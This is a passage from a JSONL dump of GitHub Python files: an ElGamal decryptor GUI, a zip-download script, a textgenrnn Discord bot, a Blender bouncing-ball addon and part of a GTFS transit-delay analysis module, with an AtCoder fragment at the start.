m\r\nprint(min(f(lo), f(hi)))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc054/B/2521456.py","file_name":"2521456.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"72230982314","text":"from .elhamal_encryptor import ElHamal\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtProperty, pyqtSlot\nfrom PyQt5.QtGui import QClipboard, QGuiApplication\n\n\nclass ElHamalDecryptor(QObject):\n keysChanged = pyqtSignal()\n encryptedMessageChanged = pyqtSignal()\n sourceMessageChanged = pyqtSignal()\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self._p = 0\n self._g = 0\n self._y = 0\n self._x = 0\n self._encryptedMessage = \"\"\n self._sourceMessage = \"\"\n self._clipboard = QGuiApplication.clipboard()\n\n @pyqtSlot()\n def pasteEncryptedMessageFromClipboard(self):\n self.encryptedMessage = self._clipboard.text(QClipboard.Clipboard)\n\n @pyqtSlot()\n def pasteKeysFromClipboard(self):\n keys = self._clipboard.text(QClipboard.Clipboard).split(' ')\n if len(keys) >= 4 and all(x.isalnum() for x in keys):\n keys = [int(x) for x in keys]\n self._p, self._g, self._y, self._x = keys[:4]\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @pyqtSlot()\n def copySourceMessageToClipboard(self):\n self._clipboard.setText(self._sourceMessage, QClipboard.Clipboard)\n\n @pyqtProperty(int, notify=keysChanged)\n def p(self) -> int:\n return self._p\n\n @pyqtProperty(int, notify=keysChanged)\n def g(self) -> int:\n return self._g\n\n @pyqtProperty(int, notify=keysChanged)\n def y(self) -> int:\n return self._y\n\n @pyqtProperty(int, notify=keysChanged)\n def x(self) -> int:\n return self._x\n\n @pyqtProperty(str, notify=sourceMessageChanged)\n def sourceMessage(self) -> str:\n self.decryptMessage()\n return self._sourceMessage\n\n @pyqtProperty(str, notify=encryptedMessageChanged)\n def encryptedMessage(self) -> str:\n return self._encryptedMessage\n\n @p.setter\n def p(self, p):\n self._p = p\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @g.setter\n def g(self, g):\n self._g = g\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @y.setter\n def y(self, y):\n self._y = y\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @x.setter\n def x(self, x):\n self._x = x\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @encryptedMessage.setter\n def encryptedMessage(self, encryptedMessage):\n self._encryptedMessage = encryptedMessage\n self.encryptedMessageChanged.emit()\n self.sourceMessageChanged.emit()\n\n def decryptMessage(self):\n keys = [self._p, self._g, self._y, self._x]\n result = ''\n if all(x >= 0 for x in keys) and len(self._encryptedMessage) > 0:\n try:\n cryptogram = ElHamal.cryptogram_from_string(\n self._encryptedMessage)\n result = ElHamal.decrypt(cryptogram, keys)\n except Exception as e:\n print(str(e))\n result = 'error'\n self._sourceMessage = result\n","repo_name":"lepesevichnikita/El-Hamal","sub_path":"src/elhamal_decryptor.py","file_name":"elhamal_decryptor.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28589499451","text":"\"\"\" Downloads zip file from the web and saves contents to a local directory.\nUsage: download_data.py --url= --out_dir=\nOptions:\n--url= URL to download data (as zip) from\n--out_dir= Path to write the unziped contents to \n\"\"\"\n\nfrom zipfile 
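# A cross-check of the slope-bisection in the AtCoder record above: for P > 1.5/ln(2)
# the minimizer of f(p) = p + P * 2**(-p/1.5) has the closed form
# p* = 1.5 * log2(P * ln(2) / 1.5), so both approaches should agree; P = 100 is a
# sample input, and smaller P must be clamped to the search interval [0, P].
from math import log, log2

P = 100.0
p_star = 1.5 * log2(P * log(2) / 1.5)
f = lambda p: p + P * 2 ** (-p / 1.5)
print(p_star, f(p_star))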
import ZipFile\nfrom io import BytesIO\nimport requests\nfrom docopt import docopt\n\nopt = docopt(__doc__)\n\ndef main(url, out_dir):\n \n #check if URL is valid\n try: \n request = requests.get(url, stream=True)\n request.raise_for_status()\n except Exception as ex: \n print(\"the URL provided is invalid\")\n print(ex)\n \n # unzip and save contents\n with ZipFile(BytesIO(request.content)) as zip_file_object:\n zip_file_object.extractall(out_dir)\n\n\nif __name__ == \"__main__\":\n main(opt['--url'],opt['--out_dir'])","repo_name":"UBC-MDS/diabetes_prediction","sub_path":"src/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37772250229","text":"# Work with Python 3.6\nimport textgenrnn\nimport discord\nimport random\nimport string\nimport os\nimport zipfile\nimport tempfile\nimport shutil\nimport time\nimport datetime\nimport json\n\nJSON_NAME = 'discord_bot.json'\n\njson_file = dict()\nTOKEN = ''\ntry:\n with open(JSON_NAME, 'r') as f:\n json_file = json.load(f)\n TOKEN = json_file['token']\nexcept:\n TOKEN = input('Input Discord Token: ')\n json_file = dict()\n json_file['token'] = TOKEN\n with open(JSON_NAME, 'w') as f:\n json.dump(json_file, f)\n\nclient = discord.Client()\n\ndef random_name(length):\n return ''.join(random.choices(string.digits + string.ascii_uppercase + string.ascii_lowercase, k=length))\n\ndef gen_text(brain_name, length, temp=1.0):\n #extract brain\n brain = os.path.dirname(__file__)\n brain = os.path.join(brain, \"brains\")\n brain = os.path.join(brain, brain_name + \".zip\")\n \n tempdir_base = tempfile.gettempdir()\n tempdir_base = os.path.join(tempdir_base, 'textgenrnn-easygen')\n tempdir = os.path.join(tempdir_base, random_name(32))\n while os.path.exists(tempdir):\n tempdir = os.path.join(tempdir_base, random_name(32))\n if not os.path.exists(tempdir_base):\n os.mkdir(tempdir_base)\n os.mkdir(tempdir)\n with zipfile.ZipFile(brain, 'r') as zf:\n zf.extractall(tempdir)\n\n #generate text\n start_time = time.time()\n from textgenrnn import textgenrnn\n\n textgen = textgenrnn(weights_path = os.path.join(tempdir, 'weights.hdf5'),\n vocab_path = os.path.join(tempdir, 'vocab.json'),\n config_path = os.path.join(tempdir, 'config.json'))\n\n print('Creating {} characters...'.format(length))\n text = textgen.generate(max_gen_length = length,\n return_as_list = True,\n temperature = temp)[0]\n\n gen_secs = time.time() - start_time\n gen_time = str(datetime.timedelta(seconds=gen_secs)).split(':')\n time_text = str(round(float(gen_time[-1]))) + \" seconds\"\n if len(gen_time) >= 2:\n mins = gen_time[-2]\n if mins[0] == '0':\n mins = mins[1:]\n if mins not in ('', '0'):\n time_text = mins + \" minutes, \" + time_text\n if len(gen_time) >= 3:\n hours = gen_time[-3]\n if hours[0] == '0':\n hours = hours[1:]\n if hours not in ('', '0'):\n time_text = hours + \" hours, \" + time_text\n print('Done making text! 
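# A hypothetical command-line invocation of the docopt script above; the URL and the
# output directory are placeholders, not real project values.
#   python download_data.py --url=https://example.com/data.zip --out_dir=data/raw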
It took {}.'.format(time_text))\n print(text)\n print('\\nCleaning up...')\n shutil.rmtree(tempdir)\n print('All done!')\n return text\n\n@client.event\nasync def on_message(message):\n # we do not want the bot to reply to itself\n if message.author == client.user:\n return\n\n content = message.content.split(\" \")\n if content[0] == \"!textgenrnn\":\n msg = None\n try:\n length = int(content[2])\n try:\n msg = gen_text(content[1], int(content[2]))\n except:\n msg = \"Invalid model name: \" + content[1]\n except:\n msg = \"Invalid length: \" + content[2]\n \n await client.send_message(message.author, msg)\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n\nclient.run(TOKEN)\n","repo_name":"nimaid/textgenrnn-easygen","sub_path":"textgenrnn_bot.py","file_name":"textgenrnn_bot.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11918571545","text":"import os\nimport pkgutil\nimport importlib\nimport math\n\nfrom time import time\nimport numpy as np\n\n\nbl_info = {\n \"name\": \"Bouncy Ball\",\n \"description\": \"Yup, just a ball that bounces around\",\n \"author\": \"Diego Gangl \",\n \"version\": (1, 0, 0),\n \"BLENDER\": (2, 70, 0),\n \"location\": \"3D View\",\n \"warning\": \"\",\n \"link\": \"\",\n \"tracker_url\": \"\",\n \"category\": \"3D View\"\n}\n\n\n# ------------------------------------------------------------------------------\n# Package Setup\n# ------------------------------------------------------------------------------\ndef setup_addon_modules(path, package_name, reload):\n \"\"\"\n Imports and reloads all modules in this addon.\n\n path -- __path__ from __init__.py\n package_name -- __name__ from __init__.py\n \"\"\"\n def get_submodule_names(path=path[0], root=\"\"):\n module_names = []\n for importer, module_name, is_package in pkgutil.iter_modules([path]):\n if is_package:\n sub_path = os.path.join(path, module_name)\n sub_root = root + module_name + \".\"\n module_names.extend(get_submodule_names(sub_path, sub_root))\n else:\n module_names.append(root + module_name)\n return module_names\n\n def import_submodules(names):\n modules = []\n for name in names:\n if name == 'batch_render.dispatcher':\n continue\n\n modules.append(importlib.import_module(\".\" + name, package_name))\n return modules\n\n def reload_modules(modules):\n for module in modules:\n importlib.reload(module)\n\n names = get_submodule_names()\n modules = import_submodules(names)\n if reload:\n reload_modules(modules)\n return modules\n\n\nmodules = setup_addon_modules(__path__, __name__, \"bpy\" in locals())\n\nimport bpy\nfrom bpy.props import (FloatProperty, FloatVectorProperty, PointerProperty)\nfrom . 
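# The hand-rolled duration formatting in gen_text above can be compared against the
# stdlib rendering of a timedelta; this sketch is illustrative only.
import datetime

gen_secs = 3725.4  # placeholder elapsed time in seconds
print(str(datetime.timedelta(seconds=round(gen_secs))))  # 1:02:05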
import ball\n\n\n# ------------------------------------------------------------------------------\n# Data\n# ------------------------------------------------------------------------------\n\nclass Bouncy_PROP_Main(bpy.types.PropertyGroup):\n\n gravity = FloatProperty(name='Gravity',\n description='Gravity',\n default=50,\n min=10,\n max=100,\n precision=1,\n subtype='PERCENTAGE')\n\n bounciness = FloatProperty(name='Bounciness',\n description='Restituion coefficient',\n default=90,\n min=0,\n max=100,\n precision=1,\n subtype='PERCENTAGE')\n\n radius = FloatProperty(name='Radius',\n description='Size of the ball',\n default=50,\n min=10,\n max=100,\n precision=1)\n\n color = FloatVectorProperty(name='Color',\n description='Ball Color',\n min=0,\n max=1,\n default=(1, 0.55, 0.06),\n subtype='COLOR')\n\n\n# ------------------------------------------------------------------------------\n# Operator\n# ------------------------------------------------------------------------------\n\nadd_handler = bpy.types.SpaceView3D.draw_handler_add\nremove_handler = bpy.types.SpaceView3D.draw_handler_remove\nadd_timer = bpy.context.window_manager.event_timer_add\nremove_timer = bpy.context.window_manager.event_timer_remove\n\n\nclass BouncyBall(bpy.types.Operator):\n \"\"\"Create a ball that bounces around the 3D View\"\"\"\n\n bl_idname = \"view3d.bouncy_ball\"\n bl_label = \"Bouncy Ball\"\n\n @classmethod\n def poll(cls, context):\n return context.area.type == 'VIEW_3D'\n\n def modal(self, context, event):\n\n context.area.tag_redraw()\n message = '{0} bounces so far | Press ESC to stop bouncing'\n context.area.header_text_set(message.format(self.args['state'].bounces))\n\n if event.type == 'TIMER' and not self.drag:\n self.args['state'] = self._move(self.args['state'])\n\n elif event.type == 'LEFTMOUSE' and event.value == 'PRESS':\n\n click = np.array((event.mouse_region_x, event.mouse_region_y))\n distance = np.linalg.norm(click - self.args['state'].position)\n\n if distance <= self.args['settings'].radius:\n context.window.cursor_set('HAND')\n self.args['ever_dragged'] = True\n\n origin = (event.mouse_region_x, event.mouse_region_y)\n\n self.drag, self.release = ball.drag_start(self.args['settings'],\n self.args['state'],\n origin)\n\n elif (event.type == 'LEFTMOUSE' and event.value == 'RELEASE' \n and self.drag):\n\n context.window.cursor_set('DEFAULT')\n self._dragging = False\n\n position = np.array((event.mouse_region_x, event.mouse_region_y))\n velocity = self.release(position)\n\n self.args['state'] = self._move(self.args['state'], velocity)\n self.drag = None\n self.release = None\n\n elif event.type == 'MOUSEMOVE' and self.drag:\n self.args['state'] = self.drag(event)\n\n elif event.type == 'ESC':\n remove_handler(self._handle, 'WINDOW')\n remove_timer(self._timer)\n context.area.header_text_set()\n\n return {'FINISHED'}\n\n return {'RUNNING_MODAL'}\n\n def invoke(self, context, event):\n\n center = np.array((context.area.width / 2, context.area.height / 2))\n ui_settings = context.window_manager.bouncy\n settings = ball.Settings(ui_settings.radius,\n np.array(ui_settings.color),\n ui_settings.gravity / 25,\n ui_settings.bounciness / 100)\n\n self.args = {\n 'settings': settings,\n 'ever_dragged': False,\n 'state': ball.State(position=center,\n velocity=np.zeros(2),\n bounces=0)\n }\n\n self.drag = None\n self.release = None\n\n self._move = ball.physics_setup(settings)\n self._timer = add_timer(1/60, context.window)\n self._handle = add_handler(ball.callback, (self.args,), \n 'WINDOW', 
'POST_PIXEL')\n\n context.window_manager.modal_handler_add(self)\n return {'RUNNING_MODAL'}\n\n\n# ------------------------------------------------------------------------------\n# UI\n# ------------------------------------------------------------------------------\n\nclass Bouncy_Panel(bpy.types.Panel):\n bl_idname = \"bouncy.panel\"\n bl_label = \"Bouncy Ball\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"TOOLS\"\n bl_category = 'Tools'\n\n def draw(self, context):\n \"\"\" Draw terrain Panel \"\"\"\n\n layout = self.layout\n settings = context.window_manager.bouncy\n\n col = layout.column(align=True)\n col.prop(settings, 'bounciness')\n col.prop(settings, 'gravity')\n\n row = layout.row()\n row.prop(settings, 'color')\n\n row = layout.row()\n row.prop(settings, 'radius')\n\n layout.separator()\n layout.separator()\n\n row = layout.row()\n row.scale_y = 1.2\n row.operator('view3d.bouncy_ball', text='Bounce!', icon='MOD_PHYSICS')\n\n\n# ------------------------------------------------------------------------------\n# Register\n# ------------------------------------------------------------------------------\n\ndef register():\n bpy.utils.register_module(__name__)\n bpy.types.WindowManager.bouncy = PointerProperty(type=Bouncy_PROP_Main)\n\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n del bpy.types.WindowManager.bouncy \n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"diegogangl/bouncy_ball","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18754881057","text":"\"\"\"\r\nAuthor: Anastassios Dardas, PhD - Higher Education Specialist at Education & Research at Esri Canada.\r\nDate: Re-modified Q1-2022\r\n\r\nAbout: 3 Classes with their own unique purpose.\r\n\t\ta) CalcSemiDf - starts building the dataframe in preparation for data augmentation.\r\n\t\t\t\t\t - Schema: stop_seque, end_paths, dist, Tot_Dist\r\n\r\n\t b) CalcEnhanceDf - Data Augmentation\r\n\t - Schema: trip_id, idx, stop_id, stop_seque, status, proj_speed, x, y,\r\n\t Tot_Dist, dist, dist_futr, futr_trvel, proj_trvel, curr_time,\r\n\t est_arr, off_earr, tmp_arr, sched_arr, arr_tmedif, off_arrdif,\r\n\t perc_chge, perf_rate, dept_time, end_path\r\n\r\n c) RefineDf -\r\n\"\"\"\r\n\r\nfrom pandas import DataFrame, concat\r\nfrom typing import List\r\nfrom .deltas import TimeDelta\r\nimport datetime as dt\r\n\r\n\r\nclass CalcSemiDf:\r\n\r\n\tdef __init__(self, consec_stpseq: List, consec_pths: List, consec_dist: List, btwn_df: DataFrame):\r\n\t\t\"\"\"\r\n\t\tConcatenates the 1st and 2nd consecutive veh. 
with dataframe that happened in-between (only mult-stop).\r\n\r\n\t\t:param consec_stpseq: A list containing the first and last stop sequence of the consecutive pair.\r\n\t\t:param consec_pths: A list containing the drawn paths from the 1st veh to its stop sequence (forward) and the 2nd veh past from its previous stop sequence (reverse).\r\n\t\t:param consec_dist: A list containing the list travelled from the 1st veh to its stop sequence and the 2nd veh travelled past from its previous stop sequence (reverse).\r\n\t\t:param btwn_df: If applicable (in-between stops classifier), the dataframe of the stops in-between 1st & 2nd veh; Schema: stop_seque, end_path, dist.\r\n\r\n\t\t:returns: Semi-final dataframe with the following schema: stop_seque, end_path, dist, and Tot_Dist (total distance covered).\r\n\t\t\"\"\"\r\n\r\n\t\tself.semi_df = self._enhance_semi_df(consec_stpseq=consec_stpseq,\r\n\t\t consec_pths=consec_pths,\r\n\t\t consec_dist=consec_dist,\r\n\t\t btwn_df=btwn_df)\r\n\r\n\r\n\tdef _enhance_semi_df(self, consec_stpseq, consec_pths, consec_dist, btwn_df):\r\n\t\t\"\"\"\r\n\t\t:param consec_stpseq: A list containing the first and last stop sequence of the consecutive pair.\r\n\t\t:param consec_pths: A list containing the drawn paths from the 1st veh to its stop sequence (forward) and the 2nd veh past from its previous stop sequence (reverse).\r\n\t\t:param consec_dist: A list containing the list travelled from the 1st veh to its stop sequence and the 2nd veh travelled past from its previous stop sequence (reverse).\r\n\t\t:param btwn_df: If applicable (in-between stops classifier), the dataframe of the stops in-between 1st & 2nd veh; Schema: stop_seque, end_path, dist.\r\n\t\t:return: Semi-final dataframe.\r\n\t\t\"\"\"\r\n\r\n\t\t# If in-between dataframe exists - otherwise proceed to else.\r\n\t\tif btwn_df is not None:\r\n\r\n\t\t\ttmp_df = DataFrame({'stop_seque': consec_stpseq,\r\n\t\t\t 'end_path': consec_pths,\r\n\t\t\t 'dist' : consec_dist})\r\n\r\n\t\t\trobust_df = (\r\n\t\t\t\tconcat([tmp_df, btwn_df])\r\n\t\t\t\t\t.sort_values(['stop_seque'])\r\n\t\t\t\t\t.pipe(lambda d: d.assign(Tot_Dist = d['dist'].sum()))\r\n\t\t\t)\r\n\r\n\t\t\treturn robust_df\r\n\r\n\t\telse:\r\n\r\n\t\t\ttmp_df = (\r\n\t\t\t\tDataFrame({'stop_seque' : consec_stpseq,\r\n\t\t 'end_path' : consec_pths,\r\n\t\t 'dist' : consec_dist})\r\n\t\t\t\t\t.sort_values(['stop_seque'])\r\n\t\t\t\t\t.pipe(lambda d: d.assign(Tot_Dist = d['dist'].sum()))\r\n\t\t\t)\r\n\r\n\t\t\treturn tmp_df\r\n\r\n\r\nclass CalcEnhanceDf:\r\n\r\n\tdef __init__(self, semi_final_df: DataFrame, trip_id, proj_speed, status, stat_shift, mid_stat, local_time,\r\n\t time_shift, future_dist, stop_times: DataFrame, idx, x1, y1, x2, y2, travel_type):\r\n\t\t\"\"\"\r\n\t\tEnhances the semi-final dataframe with important variables - aka data augmentation.\r\n\r\n\t\t:param semi_final_df: Concatenated dataframe with the following schema: stop_seque, end_path, dist, and Tot_Dist\r\n\t\t:param trip_id: The trip_id being currently assessed.\r\n\t\t:param proj_speed: Calculated projected travel speed (km/h) from time and distance delta between the consecutive pair.\r\n\t\t:param status: Current travel status of the 1st veh.\r\n\t\t:param stat_shift: Current travel status of the 2nd veh.\r\n\t\t:param mid_stat: The connection type that happened in between the 1st and 2nd veh. 
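# A toy instantiation of CalcSemiDf from the class above, assuming the module is
# importable; the stop sequences, path strings, and distances are invented.
semi = CalcSemiDf(
    consec_stpseq=[4, 7],
    consec_pths=["LINESTRING(0 0, 1 1)", "LINESTRING(1 1, 2 2)"],
    consec_dist=[120.0, 85.5],
    btwn_df=None,
)
print(semi.semi_df)  # columns: stop_seque, end_path, dist, Tot_Dist (205.5)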
(e.g., In-Between, One-Stop, etc.).\r\n\t\t:param local_time: The timestamp recorded from the 1st veh.\r\n\t\t:param time_shift: The timestamp recorded from the 2nd veh.\r\n\t\t:param future_dist: The distance that will need to be travelled in the near-future for the 2nd veh.\r\n\t\t:param stop_times: Static GTFS file with scheduled/expected arrival_time and departure time for each stop per trip_id.\r\n\t\t:param idx: The index - determining the number of vehicle movement in the consecutive group.\r\n\t\t:param x1: Snapped x-coordinate of the 1st vehicle.\r\n\t\t:param y1: Snapped y-coordinate of the 1st vehicle.\r\n\t\t:param x2: Snapped x-coordinate of the 2nd vehicle.\r\n\t\t:param y2: Snapped y-coordiante of the 2nd vehicle.\r\n\t\t:param travel_type: The type of movement travel (e.g., movement, one stop, same stop - same segment, same stop - different segment).\r\n\r\n\t\t:return: An enhanced final dataframe - see the _enhance_final_df function of what the output schema is.\r\n\t\t\"\"\"\r\n\r\n\t\tself.final_df = self._enhance_final_df(semi_final_df=semi_final_df,\r\n\t\t trip_id=trip_id,\r\n\t\t proj_speed=proj_speed,\r\n\t\t status=status,\r\n\t\t stat_shift=stat_shift,\r\n\t\t mid_stat=mid_stat,\r\n\t\t local_time=local_time,\r\n\t\t time_shift=time_shift,\r\n\t\t future_dist=future_dist,\r\n\t\t stop_times=stop_times,\r\n\t\t idx=idx,\r\n\t\t x1=x1, y1=y1,\r\n\t\t x2=x2, y2=y2,\r\n\t\t travel_type=travel_type)\r\n\r\n\r\n\tdef _addTime(self, tmp_curr_time, proj_trvel):\r\n\t\t\"\"\"\r\n\t\tEstimates the arrival time from the current timestamp and projected travel time.\r\n\r\n\t\t:param tmp_curr_time: The current timestamp.\r\n\t\t:param proj_trvel: Projected travel time estimated (seconds).\r\n\r\n\t\t:return: New timestamp - formatted: 'YYYY-mm-DD HH:MM:SS'\r\n\t\t\"\"\"\r\n\r\n\t\treturn str(dt.datetime.strptime(tmp_curr_time, '%Y-%m-%d %H:%M:%S') + dt.timedelta(0, proj_trvel))\r\n\r\n\r\n\tdef _estTime(self, curr_time, proj_trvel, btwn_df):\r\n\t\t\"\"\"\r\n\t\tIteratively & cumulatively estimate the arrival time for each observation in the group, except last.\r\n\r\n\t\tDependent function(s): _addTime\r\n\r\n\t\t:param curr_time: Current timestamp - starting with the 1st veh.\r\n\t\t:param proj_trvel: Estimated travel time - starting with the 1st veh.\r\n\t\t:param btwn_df: In-between dataframe (between 1st and 2nd veh.) 
to assess estimated travel time.\r\n\r\n\t\t:return: A list with estimated arrival time for each observation in the group, except last - set as None.\r\n\t\t\"\"\"\r\n\r\n\t\tfrst_esttime = self._addTime(tmp_curr_time=curr_time, proj_trvel=proj_trvel)\r\n\t\tidx_esttime = frst_esttime # Variable used to switch values and calculate estimated arrival time.\r\n\r\n\t\test_time = [frst_esttime] # Add estimate arrival time for first observation\r\n\t\tfor tmp_time in btwn_df['proj_trvel']: # In-between including one-stoppers\r\n\t\t\ttmp_esttime = self._addTime(tmp_curr_time=idx_esttime, proj_trvel=tmp_time)\r\n\t\t\tidx_esttime = tmp_esttime\r\n\t\t\test_time.append(tmp_esttime)\r\n\r\n\t\test_time.append(None) # Add None for the last observation b/c distance to its stop sequence is not calculated in this instance.\r\n\r\n\t\treturn est_time\r\n\r\n\r\n\tdef _classifyOnTime(self, value):\r\n\t\t\"\"\"\r\n\t\tClassifies each observation if it is late, on-time, or early.\r\n\r\n\t\t:param value: Individual value (seconds) from off_arrdif.\r\n\r\n\t\t:return: Str value that classified on-time performance.\r\n\t\t\"\"\"\r\n\r\n\t\tif value <= -120:\r\n\t\t\treturn \"Late\"\r\n\r\n\t\telif -120 < value < 300:\r\n\t\t\treturn \"On-Time\"\r\n\r\n\t\telif value >= 300:\r\n\t\t\treturn \"Early\"\r\n\r\n\r\n\tdef _perfChange(self, value, value2):\r\n\t\t\"\"\"\r\n\t\tIdentify performance change over time. Higher would indicate more abrupt change in travel.\r\n\t\tAbrupt changes could possibly indicate traffic incident or surge in passenger boardings / alightings or\r\n\t\tspeeding up to catch up with their next transit stops. These may happen over space-time broadly.\r\n\r\n\t\t:param value: Individual value from off_arrdif.\r\n\t\t:param value2: 2nd individual value (shift -1) from off_arrdif.\r\n\r\n\t\t:return: Percentage value.\r\n\t\t\"\"\"\r\n\r\n\t\ttry:\r\n\t\t\tchange = value2 - value\r\n\t\t\tperf_change = round((change / value)*100, 2)\r\n\r\n\t\t\t# if value2 is greater than value and the performance change is less than zero - turn to positive.\r\n\t\t\t# Indicate improvement\r\n\t\t\tif (value < value2) and (perf_change < 0):\r\n\t\t\t\treturn -perf_change\r\n\r\n\t\t\telse:\r\n\t\t\t\treturn perf_change\r\n\r\n\t\texcept Exception as e:\r\n\t\t\treturn None\r\n\r\n\r\n\tdef _enhance_final_df(self, semi_final_df: DataFrame, trip_id, proj_speed, status, stat_shift, mid_stat,\r\n\t local_time, time_shift, future_dist, stop_times, idx, x1, y1, x2, y2, travel_type):\r\n\t\t\"\"\"\r\n\t\tEnhance the semi-final dataframe with important variables.\r\n\r\n\t\tDependent function(s): _estTime, _perfChange, _classifyOnTime\r\n\t\tDependent classes: TimeDelta -> Identify time changes in seconds.\r\n\r\n\t\t:param semi_final_df: Concatenated dataframe with the following schema: stop_seque, end_path, dist, and Tot_Dist\r\n\t\t:param trip_id: The trip_id being currently assessed.\r\n\t\t:param proj_speed: Calculated projected travel speed (km/h) from time and distance delta between the consecutive pair.\r\n\t\t:param status: Current travel status of the 1st veh.\r\n\t\t:param stat_shift: Current travel status of the 2nd veh.\r\n\t\t:param mid_stat: The connection type that happened in between the 1st and 2nd veh. 
(e.g., In-Between, One-Stop, etc.).\r\n\t\t:param local_time: The timestamp recorded from the 1st veh.\r\n\t\t:param time_shift: The timestamp recorded from the 2nd veh.\r\n\t\t:param future_dist: The distance that will need to be travelled in the near-future for the 2nd veh.\r\n\t\t:param stop_times: Static GTFS file with scheduled/expected arrival_time and departure time for each stop per trip_id.\r\n\t\t:param idx: The recorded movement indicator.\r\n\t\t:param x1: Snapped x-coordinate of the 1st vehicle.\r\n\t\t:param y1: Snapped y-coordinate of the 1st vehicle.\r\n\t\t:param x2: Snapped x-coordinate of the 2nd vehicle.\r\n\t\t:param y2: Snapped y-coordinate of the 2nd vehicle.\r\n\t\t:param travel_type: The type of movement travel (e.g., movement, one stop, same stop - same segment, same stop - different segment, stationary, terminus).\r\n\r\n\t\t:return: Enhanced final dataframe with the following schema:\r\n\t\t\t\t\ttrip_id = Identifier of the transit route.\r\n\t\t\t\t\tidx = The cumulative number of vehicle movements - grouped per consecutive pair.\r\n\t\t\t\t\tstop_id = Identifier of the transit stop.\r\n\t\t\t\t\tstop_seque = The sequence number (order) associated to the stop_id.\r\n\t\t\t\t\tstatus = Travel status of the vehicle.\r\n\t\t\t\t\tproj_speed = Projected travel speed (km/h.) from time and distance delta between consecutive pair.\r\n\t\t\t\t\tx = The snapped x-coordinate of where the vehicle was located.\r\n\t\t\t\t\ty = The snapped y-coordinate of where the vehicle was located.\r\n\t\t\t\t\tTot_Dist = The total distance (m) travelled from the 1st to the 2nd veh. consecutive pair.\r\n\t\t\t\t\tdist = Distance traveled on each stop sequence segment - the last observation in the group calculates of what has past (reverse).\r\n\t\t\t\t\tdist_futr = The distance required for the last observation in the group needed to arrive from its current stop_sequence path (forward).\r\n\t\t\t\t\tfutr_trvel = The amount of travel time (sec.) projected to complete the future distance - last observation in the group.\r\n\t\t\t\t\tproj_trvel = The amount of travel time (sec.) projected to complete from 1st veh to 2nd veh (last observation) in the group - from dist and proj_speed.\r\n\t\t\t\t\tcurr_time = The recorded timestamp from the 1st veh. and 2nd veh. 
(last observation) in the group.\r\n\t\t\t\t\test_arr = The estimated arrival time based on proj_trvel and curr_time - cumulative, except the last observation.\r\n\t\t\t\t\toff_earr = Official estimated arrival time for all observations including the last observation (future).\r\n\t\t\t\t\ttmp_arr = The scheduled/expected arrival time reformatted - excludes the last observation in the group.\r\n\t\t\t\t\tsched_arr = Official scheduled/expected arrival time reformatted - includes the last observation in the group.\r\n\t\t\t\t\tarr_tmedif = Arrival time difference calculated from estimated arrival time and scheduled/expected arrival time - excludes last observation.\r\n\t\t\t\t\toff_arrdif = Official time difference calculated from estimated arrival time and scheduled/expected arrival time - includes last observation (forward).\r\n\t\t\t\t\tperc_chge = Percent change in official time difference - estimates how much of a change there has been in travel over time.\r\n\t\t\t\t\tperf_rate = Classification of on-time performance: Late (<= -120 sec.); On-Time (120 < x < 300); Early (>= 300).\r\n\t\t\t\t\tdept_time = The scheduled/expected departure time (not reformatted).\r\n\t\t\t\t\tend_path = The linestring paths (nested coordinates) that can be drawn out spatially if required.\r\n\t\t\"\"\"\r\n\r\n\t\t# Query by trip_id in the stop_times GTFS static file (improve efficiency) - acquire scheduled/expected arrival_time and departure_time\r\n\t\tsub_stp_time_df = stop_times.query('trip_id == @trip_id')\r\n\r\n\t\tkeep_col = ['trip_id', 'idx', 'stop_id', 'stop_seque', 'status', 'proj_speed', 'x', 'y', 'Tot_Dist', 'dist',\r\n\t\t 'dist_futr', 'futr_trvel', 'proj_trvel', 'curr_time', 'est_arr', 'off_earr', 'tmp_arr',\r\n\t\t\t\t 'sched_arr', 'arr_tmedif', 'off_arrdif', 'perc_chge', 'perf_rate', 'dept_time', 'end_path']\r\n\r\n\t\tif travel_type == \"Multiple Stops\" or travel_type == \"One Stop\":\r\n\t\t\t# Repeat the number of times in between the status. 
Exclude beginning and end; hence subtract by 2\r\n\t\t\trepeat_mid = len(semi_final_df) - 2\r\n\r\n\t\t\t# Project travel time for the future - after the 2nd vehicle based on current projected speed and distance need to travel.\r\n\t\t\tfuture_trvel = [round(((future_dist / 1000) / proj_speed) * 3600) if future_dist is not None else None][0]\r\n\r\n\t\t\t# Estimate arrival time at the end of destination of its current stop sequence - for the 2nd vehicle.\r\n\t\t\tfuture_arr = [self._addTime(tmp_curr_time=time_shift, proj_trvel=future_trvel) if future_trvel is not None else None][0]\r\n\r\n\t\t\t# Pre-build the dataframe as lists:\r\n\t\t\t# movement status, current time (recorded), distance required to complete (applies only 2nd veh.), and future projected travel time.\r\n\t\t\torder_stat = [status] + repeat_mid * [mid_stat] + [stat_shift]\r\n\t\t\tcurr_time = [local_time] + repeat_mid * [None] + [time_shift]\r\n\t\t\tdist_futr = [None] + repeat_mid * [None] + [future_dist]\r\n\t\t\tfuture_lst = [None] + repeat_mid * [None] + [future_trvel]\r\n\t\t\tidx = [idx] + repeat_mid * [idx] + [idx]\r\n\t\t\tx = [x1] + repeat_mid * [None] + 